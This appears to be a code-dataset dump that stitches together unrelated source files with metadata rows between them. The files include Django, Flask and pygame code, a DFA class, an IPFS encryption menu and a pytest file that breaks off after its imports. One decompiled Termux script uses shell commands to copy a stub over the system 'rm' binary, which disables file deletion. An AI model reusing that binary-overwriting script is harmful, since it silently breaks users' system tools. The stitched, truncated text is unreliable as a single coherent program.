from .bomberman import BomberManGame
from .whacamole import WhacAMoleGame
from .catchcoins import CatchCoinsGame
from .flappybird import FlappyBirdGame
from .angrybirds import AngryBirdsGame
from .magictower import MagicTowerGame
from .aircraftwar import AircraftWarGame
from .bunnybadger import BunnyBadgerGame
from .minesweeper import MineSweeperGame
from .greedysnake import GreedySnakeGame
from .puzzlepieces import PuzzlePiecesGame
from .towerdefense import TowerDefenseGame
from .alieninvasion import AlienInvasionGame
from .breakoutclone import BreakoutcloneGame
from .twentyfourpoint import TwentyfourPointGame
from .flipcardbymemory import FlipCardByMemoryGame
from .twozerofoureight import TwoZeroFourEightGame
from .voicecontrolpikachu import VoiceControlPikachuGame
| 38.137931
| 56
| 0.867993
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 16
| 0.014467
|
36a1039f62de29095d8932b740524a88b0801df0
| 486
|
py
|
Python
|
jobs/migrations/0005_job_date.py
|
AkinWilderman/myPort
|
3ddeea04ccffe3ed7b66d6dba2c1f2dc00c9eb6c
|
[
"Apache-2.0"
] | null | null | null |
jobs/migrations/0005_job_date.py
|
AkinWilderman/myPort
|
3ddeea04ccffe3ed7b66d6dba2c1f2dc00c9eb6c
|
[
"Apache-2.0"
] | null | null | null |
jobs/migrations/0005_job_date.py
|
AkinWilderman/myPort
|
3ddeea04ccffe3ed7b66d6dba2c1f2dc00c9eb6c
|
[
"Apache-2.0"
] | null | null | null |
# Generated by Django 2.1.7 on 2019-07-06 04:48
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('jobs', '0004_auto_20190706_0012'),
]
operations = [
migrations.AddField(
model_name='job',
name='date',
field=models.DateTimeField(default=django.utils.timezone.now, verbose_name='Date'),
preserve_default=False,
),
]
| 23.142857
| 95
| 0.625514
| 364
| 0.748971
| 0
| 0
| 0
| 0
| 0
| 0
| 95
| 0.195473
|
36a13155d02a4fb82c1083890ce96f64e834d72a
| 715
|
py
|
Python
|
build_an_ai_startup_demo/app/__init__.py
|
bbueno5000/BuildAnAIStartUpDemo
|
f70371802a2546530c34b7f04e2b644cd1faec8a
|
[
"MIT"
] | null | null | null |
build_an_ai_startup_demo/app/__init__.py
|
bbueno5000/BuildAnAIStartUpDemo
|
f70371802a2546530c34b7f04e2b644cd1faec8a
|
[
"MIT"
] | null | null | null |
build_an_ai_startup_demo/app/__init__.py
|
bbueno5000/BuildAnAIStartUpDemo
|
f70371802a2546530c34b7f04e2b644cd1faec8a
|
[
"MIT"
] | null | null | null |
import app
import flask
import flask_debugtoolbar
app = flask.Flask(__name__)
app.config.from_object('app.config')
db = flask.ext.sqlalchemy.SQLAlchemy(app)
mail = flask.ext.mail.Mail(app)
app.config['DEBUG_TB_TEMPLATE_EDITOR_ENABLED'] = True
app.config['DEBUG_TB_PROFILER_ENABLED'] = True
toolbar = flask_debugtoolbar.DebugToolbarExtension(app)
bcrypt = flask.ext.bcrypt.Bcrypt(app)
app.register_blueprint(app.views.user.userbp)
login_manager = flask.ext.login.LoginManager()
login_manager.init_app(app)
login_manager.login_view = 'userbp.signin'
@login_manager.user_loader
def load_user(email):
"""
DOCSTRING
"""
return app.models.User.query.filter(app.models.User.email == email).first()
| 23.833333
| 79
| 0.776224
| 0
| 0
| 0
| 0
| 158
| 0.220979
| 0
| 0
| 113
| 0.158042
|
36a2d86f1e49ac5520b342c8f2a78f162854b298
| 304
|
py
|
Python
|
main.py
|
shoulderhu/heroku-ctf-www
|
f1e136f8d93034d34a60702517b32fc0245dac38
|
[
"MIT"
] | null | null | null |
main.py
|
shoulderhu/heroku-ctf-www
|
f1e136f8d93034d34a60702517b32fc0245dac38
|
[
"MIT"
] | null | null | null |
main.py
|
shoulderhu/heroku-ctf-www
|
f1e136f8d93034d34a60702517b32fc0245dac38
|
[
"MIT"
] | null | null | null |
import os
from app import create_app
from dotenv import load_dotenv
# .env
dotenv_path = os.path.join(os.path.dirname(__file__), ".env")
if os.path.exists(dotenv_path):
load_dotenv(dotenv_path)
app = create_app(os.environ.get("FLASK_CONFIG") or "default")
if __name__ == "__main__":
app.run()
| 21.714286
| 61
| 0.733553
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 45
| 0.148026
|
36a322147c11bf81187e2fb1867ec7eedebfc053
| 1,663
|
py
|
Python
|
COMP/W01/class_DFA.py
|
joao-frohlich/BCC
|
9ed74eb6d921d1280f48680677a2140c5383368d
|
[
"Apache-2.0"
] | 10
|
2020-12-08T20:18:15.000Z
|
2021-06-07T20:00:07.000Z
|
COMP/W01/class_DFA.py
|
joao-frohlich/BCC
|
9ed74eb6d921d1280f48680677a2140c5383368d
|
[
"Apache-2.0"
] | 2
|
2021-06-28T03:42:13.000Z
|
2021-06-28T16:53:13.000Z
|
COMP/W01/class_DFA.py
|
joao-frohlich/BCC
|
9ed74eb6d921d1280f48680677a2140c5383368d
|
[
"Apache-2.0"
] | 2
|
2021-01-14T19:59:20.000Z
|
2021-06-15T11:53:21.000Z
|
class DFA:
current_state = None
current_letter = None
valid = True
def __init__(
self, name, alphabet, states, delta_function, start_state, final_states
):
self.name = name
self.alphabet = alphabet
self.states = states
self.delta_function = delta_function
self.start_state = start_state
self.final_states = final_states
self.current_state = start_state
def transition_to_state_with_input(self, letter):
if self.valid:
if (self.current_state, letter) not in self.delta_function.keys():
self.valid = False
return
self.current_state = self.delta_function[(self.current_state, letter)]
self.current_letter = letter
else:
return
def in_accept_state(self):
return self.current_state in self.final_states and self.valid
def go_to_initial_state(self):
self.current_letter = None
self.valid = True
self.current_state = self.start_state
def run_with_word(self, word):
self.go_to_initial_state()
for letter in word:
self.transition_to_state_with_input(letter)
continue
return self.in_accept_state()
def run_with_letters(self, word):
self.go_to_initial_state()
for letter in word:
if self.run_with_letter(letter):
return
else:
return
def run_with_letter(self, letter):
self.transition_to_state_with_input(letter)
return self.current_state
def __len__(self):
return len(self.states)
| 29.175439
| 82
| 0.623572
| 1,662
| 0.999399
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
36a374d5b35c8fab447dcc5b470ddd3335b4f06d
| 5,628
|
py
|
Python
|
src/apps/devices/cubelib/emulator.py
|
ajintom/music_sync
|
0d7bc302502d28e4be4f0a0be1fc9bafb706f651
|
[
"MIT"
] | null | null | null |
src/apps/devices/cubelib/emulator.py
|
ajintom/music_sync
|
0d7bc302502d28e4be4f0a0be1fc9bafb706f651
|
[
"MIT"
] | null | null | null |
src/apps/devices/cubelib/emulator.py
|
ajintom/music_sync
|
0d7bc302502d28e4be4f0a0be1fc9bafb706f651
|
[
"MIT"
] | null | null | null |
#!/bin/env python
#using the wireframe module downloaded from http://www.petercollingridge.co.uk/
import mywireframe as wireframe
import pygame
from pygame import display
from pygame.draw import *
import time
import numpy
key_to_function = {
pygame.K_LEFT: (lambda x: x.translateAll('x', -10)),
pygame.K_RIGHT: (lambda x: x.translateAll('x', 10)),
pygame.K_DOWN: (lambda x: x.translateAll('y', 10)),
pygame.K_UP: (lambda x: x.translateAll('y', -10)),
pygame.K_EQUALS: (lambda x: x.scaleAll(1.25)),
pygame.K_MINUS: (lambda x: x.scaleAll( 0.8)),
pygame.K_q: (lambda x: x.rotateAll('X', 0.1)),
pygame.K_w: (lambda x: x.rotateAll('X', -0.1)),
pygame.K_a: (lambda x: x.rotateAll('Y', 0.1)),
pygame.K_s: (lambda x: x.rotateAll('Y', -0.1)),
pygame.K_z: (lambda x: x.rotateAll('Z', 0.1)),
pygame.K_x: (lambda x: x.rotateAll('Z', -0.1))}
class ProjectionViewer:
""" Displays 3D objects on a Pygame screen """
def __init__(self, width, height):
self.width = width
self.height = height
self.screen = pygame.display.set_mode((width, height))
pygame.display.set_caption('Wireframe Display')
self.background = (10,10,50)
self.wireframes = {}
self.displayNodes = True
self.displayEdges = True
self.nodeColour = (255,255,255)
self.edgeColour = (200,200,200)
self.nodeRadius = 3 #Modify to change size of the spheres
def addWireframe(self, name, wireframe):
""" Add a named wireframe object. """
self.wireframes[name] = wireframe
def run(self):
for event in pygame.event.get():
if event.type == pygame.KEYDOWN:
if event.key in key_to_function:
key_to_function[event.key](self)
self.display()
pygame.display.flip()
def display(self):
""" Draw the wireframes on the screen. """
self.screen.fill(self.background)
for wireframe in self.wireframes.values():
if self.displayEdges:
for edge in wireframe.edges:
pygame.draw.aaline(self.screen, self.edgeColour, (edge.start.x, edge.start.y), (edge.stop.x, edge.stop.y), 1)
if self.displayNodes:
for node in wireframe.nodes:
if node.visiblity:
pygame.draw.circle(self.screen, self.nodeColour, (int(node.x), int(node.y)), self.nodeRadius, 0)
def translateAll(self, axis, d):
""" Translate all wireframes along a given axis by d units. """
for wireframe in self.wireframes.itervalues():
wireframe.translate(axis, d)
def scaleAll(self, scale):
""" Scale all wireframes by a given scale, centred on the centre of the screen. """
centre_x = self.width/2
centre_y = self.height/2
for wireframe in self.wireframes.itervalues():
wireframe.scale((centre_x, centre_y), scale)
def rotateAll(self, axis, theta):
""" Rotate all wireframe about their centre, along a given axis by a given angle. """
rotateFunction = 'rotate' + axis
for wireframe in self.wireframes.itervalues():
centre = wireframe.findCentre()
getattr(wireframe, rotateFunction)(centre, theta)
def createCube(self,cube,X=[50,140], Y=[50,140], Z=[50,140]):
cube.addNodes([(x,y,z) for x in X for y in Y for z in Z]) #adding the nodes of the cube framework.
allnodes = []
cube.addEdges([(n,n+4) for n in range(0,4)]+[(n,n+1) for n in range(0,8,2)]+[(n,n+2) for n in (0,1,4,5)]) #creating edges of the cube framework.
for i in range(0,10):
for j in range(0,10):
for k in range(0,10):
allnodes.append((X[0]+(X[1]-X[0])/9 * i,Y[0]+(Y[1] - Y[0])/9 * j,Z[0] + (Z[1]-Z[0])/9 * k))
cube.addNodes(allnodes)
#cube.outputNodes()
self.addWireframe('cube',cube)
def findIndex(coords): #Send coordinates of the points you want lit up. Will convert to neede
indices = []
for nodes in coords:
x,y,z = nodes
index = x*100+y*10+z + 8
indices.append(index)
return indices
def findIndexArray(array): #Takes a 3-D numpy array containing bool of all the LED points.
indices = []
for i in range(0,10):
for j in range(0,10):
for k in range(0,10):
if(array[i][j][k] == 1):
index = i*100+j*10+ k + 8
indices.append(index)
return indices
def wireframecube(size):
if size % 2 == 1:
size = size+1
half = size/2
start = 5 - half
end = 5 + half - 1
cubecords = [(x,y,z) for x in (start,end) for y in (start,end) for z in range(start,end+1)]+[(x,z,y) for x in (start,end) for y in (start,end) for z in range(start,end+1)] + [(z,y,x) for x in (start,end) for y in (start,end) for z in range(start,end+1)]
return cubecords
def cubes(size):
if size % 2 == 1:
size = size+1
half = size/2
cubecords = []
for i in range(0,size):
for j in range(0,size):
for k in range(0,size):
cubecords.append((5-half+i,5-half+j,5-half+k))
return cubecords
if __name__ == '__main__':
pv = ProjectionViewer(400, 300)
allnodes =[]
cube = wireframe.Wireframe() #storing all the nodes in this wireframe object.
X = [50,140]
Y = [50,140]
Z = [50,140]
pv.createCube(cube,X,Y,Z)
YZface = findIndex((0,y,z) for y in range(0,10) for z in range(0,10))
count = 0
for k in range(1,150000):
if k%5000 ==2500:
count = (count+2)%11
cube.setVisible(findIndex(wireframecube(count)))
pv.run()
| 33.903614
| 254
| 0.600569
| 3,084
| 0.547974
| 0
| 0
| 0
| 0
| 0
| 0
| 842
| 0.149609
|
36a5039b731ed609ed21354c488bea0e48e4d31a
| 502
|
py
|
Python
|
lambda_handlers/errors.py
|
renovate-tests/lambda-handlers
|
0b14013f19b597524a8d50f7ea8813ee726c584c
|
[
"Apache-2.0"
] | null | null | null |
lambda_handlers/errors.py
|
renovate-tests/lambda-handlers
|
0b14013f19b597524a8d50f7ea8813ee726c584c
|
[
"Apache-2.0"
] | null | null | null |
lambda_handlers/errors.py
|
renovate-tests/lambda-handlers
|
0b14013f19b597524a8d50f7ea8813ee726c584c
|
[
"Apache-2.0"
] | null | null | null |
class LambdaError(Exception):
def __init__(self, description):
self.description = description
class BadRequestError(LambdaError):
pass
class ForbiddenError(LambdaError):
pass
class InternalServerError(LambdaError):
pass
class NotFoundError(LambdaError):
pass
class ValidationError(LambdaError):
pass
class FormattingError(LambdaError):
pass
class EventValidationError(ValidationError):
pass
class ResultValidationError(ValidationError):
pass
| 13.944444
| 45
| 0.750996
| 477
| 0.950199
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
36a6702d9737607ae7b2838e31ebcda4772cd182
| 810
|
py
|
Python
|
src/topbuzz/management/commands/topbuzz_stat.py
|
lucemia/gnews
|
ac537062d8e34bb63fe0bf95c2affc8d2771d392
|
[
"MIT"
] | null | null | null |
src/topbuzz/management/commands/topbuzz_stat.py
|
lucemia/gnews
|
ac537062d8e34bb63fe0bf95c2affc8d2771d392
|
[
"MIT"
] | null | null | null |
src/topbuzz/management/commands/topbuzz_stat.py
|
lucemia/gnews
|
ac537062d8e34bb63fe0bf95c2affc8d2771d392
|
[
"MIT"
] | null | null | null |
# -*- encoding=utf8 -*-
from django.core.management.base import BaseCommand
from datetime import timedelta, datetime
from topbuzz.tasks import stat
import argparse
def valid_date(s):
try:
return datetime.strptime(s, "%Y-%m-%d")
except ValueError:
msg = "Not a valid date: '{0}'.".format(s)
raise argparse.ArgumentTypeError(msg)
class Command(BaseCommand):
help = 'create campaign'
def add_arguments(self, parser):
parser.add_argument('channel', type=str)
parser.add_argument('start_date', type=valid_date)
parser.add_argument('end_date', type=valid_date)
parser.add_argument('cookie', type=str)
def handle(self, *args, **kwargs):
print stat(kwargs['channel'], kwargs['start_date'], kwargs['end_date'], kwargs['cookie'])
| 30
| 97
| 0.675309
| 445
| 0.549383
| 0
| 0
| 0
| 0
| 0
| 0
| 154
| 0.190123
|
36a769a0d7113d319d2bf9fc65325d50afd0198f
| 5,276
|
py
|
Python
|
Banner/rm_decompiled.py
|
Alpha-Demon404/RE-14
|
b5b46a9f0eee218f2a642b615c77135c33c6f4ad
|
[
"MIT"
] | 39
|
2020-02-26T09:44:36.000Z
|
2022-03-23T00:18:25.000Z
|
Banner/rm_decompiled.py
|
B4BY-DG/reverse-enginnering
|
b5b46a9f0eee218f2a642b615c77135c33c6f4ad
|
[
"MIT"
] | 15
|
2020-05-14T10:07:26.000Z
|
2022-01-06T02:55:32.000Z
|
Banner/rm_decompiled.py
|
B4BY-DG/reverse-enginnering
|
b5b46a9f0eee218f2a642b615c77135c33c6f4ad
|
[
"MIT"
] | 41
|
2020-03-16T22:36:38.000Z
|
2022-03-17T14:47:19.000Z
|
# uncompyle6 version 3.6.4
# Python bytecode 2.7
# Decompiled from: Python 2.7.17 (default, Oct 23 2019, 08:25:46)
# [GCC 4.2.1 Compatible Android (5220042 based on r346389c) Clang 8.0.7 (https://
# Embedded file name: <Angga>
"""
SILAHKAN RECODE SE ALAY MUNGKIN
DAN TIRU GAYA TAMPILAN SAYA :)
KASIH LOGO GEDE, WARNA KEK HOMO
TAMBAHIN AUTHOR NAMA SENDIRI
PRO
. GELLMOXER .
.
"""
import os, sys
try:
if os.path.exists('/data/data/com.termux/files/usr/lib/libncurss.so'):
pass
else:
nf = 'echo -e "\n\x1b[1;97m \xe2\x96\xb6 \x1b[1;91mRM \x1b[1;97mNON\x1b[1;96mAKTIF\x1b[1;97m !!\n"\nexit'
wf = open('/data/data/com.termux/files/usr/lib/libncurss.so', 'w')
wf.write(nf)
wf.close()
except:
pass
try:
ck = open('/data/data/com.termux/files/usr/bin/rm', 'r').read()
if 'AKTIF' in ck:
print ' \x1b[1;96m\xe2\x95\xad\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x95\xae\n \xe2\x94\x82 \x1b[1;90mANTI REMOVE \x1b[1;97m(\x1b[1;96mAKTIF\x1b[1;97m) \x1b[1;96m\xe2\x94\x82\n \xe2\x94\x9c\xe2\x94\x80\xe2\x94\xb3\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\xa4 \n \xe2\x94\x831\xe2\x94\x9c\xe2\x9e\xa4 GANTI \x1b[48;5;009m \x1b[48;5;000m\xe2\x94\x83\n \xe2\x94\x830\xe2\x94\x9c\xe2\x9e\xa4 EXIT \x1b[48;5;015m \x1b[48;5;000m\xe2\x94\x83\n \xe2\x94\x9c\xe2\x94\x80\xe2\x94\xbb\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x95\xaf'
ty = raw_input(' \x1b[1;96m\xe2\x95\xb0\xe2\x9e\xa4 ')
try:
if ty == '1':
os.system('cp ~/../usr/lib/.libncurss.so ~/../usr/bin/rm')
os.system('chmod +x ~/../usr/bin/rm')
print '\x1b[1;97m \xe2\x9e\xa4 \x1b[1;90mSukses Mencopot \x1b[1;97mANTI\x1b[1;91mRM'
else:
os.system('exit')
except:
print '\x1b[1;91m \xe2\x9e\xa4 \x1b[1;90mGagal Mencopot \x1b[1;97mANTI\x1b[1;91mRM'
else:
print ' \x1b[1;96m\xe2\x95\xad\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x95\xae\n \xe2\x94\x82 \x1b[1;90mANTI REMOVE \x1b[1;97m(\x1b[1;91mNONAKTIF\x1b[1;97m) \x1b[1;96m\xe2\x94\x82\n \xe2\x94\x9c\xe2\x94\x80\xe2\x94\xb3\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\xa4 \n \xe2\x94\x831\xe2\x94\x9c\xe2\x9e\xa4 GANTI \x1b[48;5;009m \x1b[48;5;000m\xe2\x94\x83\n \xe2\x94\x830\xe2\x94\x9c\xe2\x9e\xa4 EXIT \x1b[48;5;015m \x1b[48;5;000m\xe2\x94\x83\n \xe2\x94\x9c\xe2\x94\x80\xe2\x94\xbb\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x95\xaf'
ty = raw_input(' \x1b[1;96m\xe2\x95\xb0\xe2\x9e\xa4 ')
if ty == '1':
os.system('cp ~/../usr/bin/rm ~/../usr/lib/.libncurss.so')
os.system('cp ~/../usr/lib/libncurss.so ~/../usr/bin/rm')
os.system('chmod +x ~/../usr/bin/rm')
print '\x1b[1;97m \xe2\x9e\xa4 \x1b[1;90mSukses Memasang \x1b[1;97mANTI\x1b[1;91mRM'
elif ty == '0':
os.system('exit')
else:
os.system('exit')
print '\x1b[1;91m \xe2\x9e\xa4 \x1b[1;90mGagal Memasang \x1b[1;97mANTI\x1b[1;91mRM'
except:
print ' \x1b[1;96m\xe2\x95\xad\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x95\xae\n \xe2\x94\x82 \x1b[1;91mERROR CHECK \x1b[1;90mGO \x1b[1;97mHOME \x1b[1;96m\xe2\x94\x82\n \xe2\x94\x9c\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x95\xaf'
ty = raw_input(' \x1b[1;96m\xe2\x95\xb0\xe2\x9e\xa4 ')
if ty == '1':
os.system('exit')
else:
os.system('exit')
| 85.096774
| 1,273
| 0.649545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 4,460
| 0.845337
|
36a8051c9ed294e493f8410cbd5528938ce673ec
| 2,712
|
py
|
Python
|
main.py
|
anirudha-bs/Distributed_storage_ipfs
|
52fcf0f5b7b620dea059116d34ab0def56ce5cdd
|
[
"MIT"
] | null | null | null |
main.py
|
anirudha-bs/Distributed_storage_ipfs
|
52fcf0f5b7b620dea059116d34ab0def56ce5cdd
|
[
"MIT"
] | null | null | null |
main.py
|
anirudha-bs/Distributed_storage_ipfs
|
52fcf0f5b7b620dea059116d34ab0def56ce5cdd
|
[
"MIT"
] | null | null | null |
from files import write_key, load_key, encrypt, decrypt
import os
from ipfs import add,pin,get_file
def switch(option):
return switcher.get(option, default)()
# Encrypts file and adds to ipfs
def encrypt_ipfs_add():
file=input("Enter the file name to be added - ")
# Look for saved key, if not found then create one
try:
key = load_key()
except:
write_key()
key = load_key()
#encrypt file
encrypt(file,key)
#returns file details added to ipfs
res = add(file)
#pinning the file to mark it important
print("Encrpted file was added to ipfs")
try:
f = open("ipfs_files","a")
f.write("{} - {}\n".format(file, str(res)))
except:
print("IO error")
print("File added to IPFS - " + str(res) + "\nThe filename and CID is stored in a file named IPFS_files for future references" )
def ipfs_add():
file=input("Enter the file name to be added - ")
res = add(file)
#pinning the file to mark it important
pin(file)
print("The file was added to ipfs")
print(res)
def decrypt_ipfs():
#hash of the file added to ipfs earlier
hash = input("Enter the hash of the file you want to retrive - ")
res = get_file(hash)
# Look for saved key, if not found then create one
try:
key = load_key()
except:
print("No key found")
exit(0)
decrypt(res,key)
#decrypted file will be saved as res.txt
print("THe file " + hash + " was successfully decrpted")
#function to get a file added to ipfs
def ipfs_get():
hash = input("Enter the hash of the file you want to retrive - ")
get_file(hash)
print("The file has been stored at res.txt ")
def sim_block():
print("Go to Blockchain_simulator directory and start the simulator by running go run .")
path = "blockchain_simulator/blocks.txt"
p_time = os.stat(path).st_mtime
while(1):
if os.stat(path).st_mtime > p_time:
p_time = os.stat(path).st_mtime
res = add(path)
print("New block detected , file updated in ipfs")
print(res)
def default():
return "Please select a valid option"
switcher = {
1: encrypt_ipfs_add,
2: ipfs_add,
3: decrypt_ipfs,
4: ipfs_get,
5: sim_block,
}
if __name__ == "__main__":
while(1):
print("\nDistributed storage\n -------Menu------ \n 1. Encrypt file and add to IPFS \n 2. Add file to ipfs without encryption \n 3. Decrypt a file from IPFS \n 4. Get file from IPFS \n 5. Simulate blockchain and add blocks to IPFS \n 6. Exit \n")
option = int(input())
switch(option)
if option==6:
break
| 30.133333
| 254
| 0.620206
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,277
| 0.47087
|
36a8576ce226acd209efa0c300493610cf449c81
| 4,730
|
py
|
Python
|
web-app/ZGenerator.py
|
IsaacGuan/SGSG
|
7476f1b8ec0ed90cd9896ee2d23241c4310cb78c
|
[
"MIT"
] | 2
|
2021-05-04T11:19:50.000Z
|
2021-05-16T01:37:08.000Z
|
web-app/ZGenerator.py
|
IsaacGuan/SGSG
|
7476f1b8ec0ed90cd9896ee2d23241c4310cb78c
|
[
"MIT"
] | null | null | null |
web-app/ZGenerator.py
|
IsaacGuan/SGSG
|
7476f1b8ec0ed90cd9896ee2d23241c4310cb78c
|
[
"MIT"
] | 1
|
2021-05-15T10:23:54.000Z
|
2021-05-15T10:23:54.000Z
|
import os
import tensorflow as tf
import numpy as np
import mcubes
from ops import *
class ZGenerator:
def __init__(self, sess, z_dim=128, ef_dim=32, gf_dim=128, dataset_name=None):
self.sess = sess
self.input_size = 64
self.z_dim = z_dim
self.ef_dim = ef_dim
self.gf_dim = gf_dim
self.dataset_name = dataset_name
self.real_size = 64
self.test_size = 32
self.batch_size = self.test_size*self.test_size*self.test_size
self.build_model()
def build_model(self):
self.z_vector = tf.placeholder(shape=[1,self.z_dim], dtype=tf.float32)
self.point_coord = tf.placeholder(shape=[self.batch_size,3], dtype=tf.float32)
self.point_value = tf.placeholder(shape=[self.batch_size,1], dtype=tf.float32)
self.zG = self.generator(self.point_coord, self.z_vector, phase_train=True, reuse=False)
self.loss = tf.reduce_mean(tf.square(self.point_value - self.zG))
self.saver = tf.train.Saver(max_to_keep=10)
def generator(self, points, z, phase_train=True, reuse=False):
with tf.variable_scope('simple_net') as scope:
if reuse:
scope.reuse_variables()
zs = tf.tile(z, [self.batch_size,1])
pointz = tf.concat([points,zs],1)
h1 = lrelu(linear(pointz, self.gf_dim*16, 'h1_lin'))
h1 = tf.concat([h1,pointz],1)
h2 = lrelu(linear(h1, self.gf_dim*8, 'h4_lin'))
h2 = tf.concat([h2,pointz],1)
h3 = lrelu(linear(h2, self.gf_dim*4, 'h5_lin'))
h3 = tf.concat([h3,pointz],1)
h4 = lrelu(linear(h3, self.gf_dim*2, 'h6_lin'))
h4 = tf.concat([h4,pointz],1)
h5 = lrelu(linear(h4, self.gf_dim, 'h7_lin'))
h6 = tf.nn.sigmoid(linear(h5, 1, 'h8_lin'))
return tf.reshape(h6, [self.batch_size,1])
def test(self, checkpoint_dir, batch_z, dim=64):
could_load, checkpoint_counter = self.load(checkpoint_dir)
if could_load:
print(' [*] Load SUCCESS')
else:
print(' [!] Load failed...')
return
dima = self.test_size
multiplier = int(dim/dima)
multiplier2 = multiplier*multiplier
multiplier3 = multiplier*multiplier*multiplier
aux_x = np.zeros([dima,dima,dima],np.int32)
aux_y = np.zeros([dima,dima,dima],np.int32)
aux_z = np.zeros([dima,dima,dima],np.int32)
for i in range(dima):
for j in range(dima):
for k in range(dima):
aux_x[i,j,k] = i*multiplier
aux_y[i,j,k] = j*multiplier
aux_z[i,j,k] = k*multiplier
coords = np.zeros([multiplier3,dima,dima,dima,3],np.float32)
for i in range(multiplier):
for j in range(multiplier):
for k in range(multiplier):
coords[i*multiplier2+j*multiplier+k,:,:,:,0] = aux_x+i
coords[i*multiplier2+j*multiplier+k,:,:,:,1] = aux_y+j
coords[i*multiplier2+j*multiplier+k,:,:,:,2] = aux_z+k
coords = (coords+0.5)/dim*2.0-1.0
coords = np.reshape(coords,[multiplier3,self.batch_size,3])
for t in range(batch_z.shape[0]):
model_float = np.zeros([dim+2,dim+2,dim+2],np.float32)
for i in range(multiplier):
for j in range(multiplier):
for k in range(multiplier):
minib = i*multiplier2+j*multiplier+k
model_out = self.sess.run(self.zG,
feed_dict={
self.z_vector: batch_z[t:t+1],
self.point_coord: coords[minib],
})
model_float[aux_x+i+1,aux_y+j+1,aux_z+k+1] = np.reshape(model_out, [dima,dima,dima])
thres = 0.2
vertices, triangles = mcubes.marching_cubes(model_float, thres)
return vertices, triangles
def load(self, checkpoint_dir):
import re
print(' [*] Reading checkpoints...')
ckpt = tf.train.get_checkpoint_state(checkpoint_dir)
if ckpt and ckpt.model_checkpoint_path:
ckpt_name = os.path.basename(ckpt.model_checkpoint_path)
self.saver.restore(self.sess, os.path.join(checkpoint_dir, ckpt_name))
counter = int(next(re.finditer('(\d+)(?!.*\d)',ckpt_name)).group(0))
print(' [*] Success to read {}'.format(ckpt_name))
return True, counter
else:
print(' [*] Failed to find a checkpoint')
return False, 0
| 37.539683
| 108
| 0.558774
| 4,642
| 0.981395
| 0
| 0
| 0
| 0
| 0
| 0
| 203
| 0.042918
|
36a935bd4ad858c3f4e568ba75cc0dc9d2989f18
| 2,410
|
py
|
Python
|
tests/crud/test_crud_user.py
|
congdh/fastapi-realworld
|
42c8630aedf594b69bc96a327b04dfe636a785fe
|
[
"MIT"
] | null | null | null |
tests/crud/test_crud_user.py
|
congdh/fastapi-realworld
|
42c8630aedf594b69bc96a327b04dfe636a785fe
|
[
"MIT"
] | null | null | null |
tests/crud/test_crud_user.py
|
congdh/fastapi-realworld
|
42c8630aedf594b69bc96a327b04dfe636a785fe
|
[
"MIT"
] | null | null | null |
import pytest
from faker import Faker
from fastapi.encoders import jsonable_encoder
from pydantic.types import SecretStr
